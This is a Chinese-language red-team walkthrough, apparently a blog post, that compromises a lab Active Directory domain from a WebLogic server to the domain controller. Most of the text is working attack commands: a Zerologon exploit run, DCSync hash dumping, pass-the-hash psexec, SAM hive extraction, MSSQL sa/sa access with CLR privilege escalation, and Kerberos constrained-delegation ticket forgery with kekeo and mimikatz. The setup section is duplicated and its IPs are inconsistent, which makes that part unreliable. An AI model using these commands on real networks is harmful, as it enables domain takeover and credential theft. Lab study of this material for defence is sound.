环境搭建
web服务器:
外网IP 192.160.0.100
内网IP 10.10.20.12
域内机器win7 :
内网IP 10.10.20.7
内网IP 10.10.10.7
域内服务器 Mssql:
内网IP 10.10.10.18
域控机器:
内网IP 10.10.10.8
1.2000多本网络安全系列电子书
2.网络安全标准题库资料
3.项目源码
4.网络安全基础入门、Linux、web安全、攻防方面的视频
5.网络安全学习路线图
外网渗透
端口扫描
搭建好环境,对目标192.168.0.100进行端口扫描探测
目录扫描
发现目标开放了7001端口,进行目录扫描探测,发现weblogic登录口
weblogic漏洞利用
尝试weblogic弱口令登录不成功
通过weblogic漏洞利用工具,发现目标存在CVE-2020-2551漏洞可以利用
出网探测
ping www.baidu.com发现目标机器出网
环境搭建
web服务器:
外网IP 192.160.0.100
内网IP 10.10.20.12
域内机器win7 :
内网IP 10.10.20.7
内网IP 10.10.10.7
域内服务器 Mssql:
内网IP 10.10.10.18
域控机器:
内网IP 10.10.10.8
1.2000多本网络安全系列电子书
2.网络安全标准题库资料
3.项目源码
4.网络安全基础入门、Linux、web安全、攻防方面的视频
5.网络安全学习路线图
外网渗透
端口扫描
搭建好环境,对目标192.168.0.100进行端口扫描探测
目录扫描
发现目标开放了7001端口,进行目录扫描探测,发现weblogic登录口
weblogic漏洞利用
尝试weblogic弱口令登录不成功
通过weblogic漏洞利用工具,发现目标存在CVE-2020-2551漏洞可以利用
出网探测
ping www.baidu.com发现目标机器出网
中转上线
由于目标机器win7不出网,因此以跳板机器作为中转,新建一个监听器
通过psexec进行上线
成功上线后进行内网扫描,探测存活主机,发现还存在10.10.10.8和10.10.10.18两台机器
通过信息搜集发现当前机器是在域环境内net user /domain
定位域控
接着定位到域控 net group "domain controllers" /domain
ps:一般来说DNS服务器就是域控
CVE-2020-1472
影响版本:
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)
通过CVE-2020-1472脚本进行检测
1、重置管理员密钥,进行置空
python3 cve-2020-1472-exploit.py OWA 10.10.10.8
2、通过 Dcsync 查看密码hash
python secretsdump.py redteam.red/OWA$@10.10.10.8 -just-dc -no-pass
3、通过psexec和hash获取域控权限
python psexec.py administrator@10.10.10.8 -hashes aad3b435b51404eeaad3b435b51404ee:ccef208c6485269c20db2cad21734fe7
4、使用secretsdump解析保存在本地的nt hash
reg save HKLM\SAM sam.save
reg save HKLM\SYSTEM system.save
reg save HKLM\SECURITY security.save
python3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
5、通过reinstall脚本将$MACHINE.ACC:plain_password_hex中的原来nt hash恢复
python reinstall_original_pw.py OWA 10.10.10.8 8623dc75ede3ca9ec11f2475b12ef96d
约束委派接管域控
1、通过adfind寻找约束委派的用户,发现为sqlserver的机器
AdFind.exe -h 10.10.10.8 -u saul -up admin!@#45 -b "DC=redteam,DC=red" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto
2、通过端口探测发现sqlserver为10.10.10.18机器
3、使用fscan进行扫描fscan.exe -h 10.10.10.0/24 sqlserver为弱口令sa/sa
4、使用工具查看当前权限SharpSQLTools.exe 10.10.10.18 sa sa master xp_cmdshell whoami
5、权限较低,使用以下命令进行提权:
SharpSQLTools.exe 10.10.10.18 sa sa master install_clr whoami
SharpSQLTools.exe 10.10.10.18 sa sa master enable_clr
SharpSQLTools.exe 10.10.10.18 sa sa master clr_efspotato whoami
6、上线CS并抓到sqlserver的密码redteam\sqlserver Server12345
根据先前的信息搜集可知 sqlserver 是一个约束委派用户,可以通过约束委派攻击来接管域控
1、利用 kekeo 请求该用户的 TGT
kekeo.exe "tgt::ask /user:sqlserver /domain:redteam.red /password:Server12345 /ticket:administrator.kirbi"
2、然后使用这张 TGT 获取域机器的 ST
kekeo.exe "tgs::s4u /tgt: TGT_sqlserver@REDTEAM.RED_krbtgt~redteam.red@REDTEAM.RED.kirbi /user:Administrator@redteam.red /service:cifs/owa.redteam.red"
3、使用 mimikatz 将 ST 导入当前会话,运行 mimikatz 进行 ptt
mimikatz kerberos::ptt TGS_Administrator@redteam.red@REDTEAM.RED_cifs~owa.redteam.red@REDTEAM.RED.kirbi
4、成功获取域控权限
最后
点击查看【网络安全学习资料·攻略】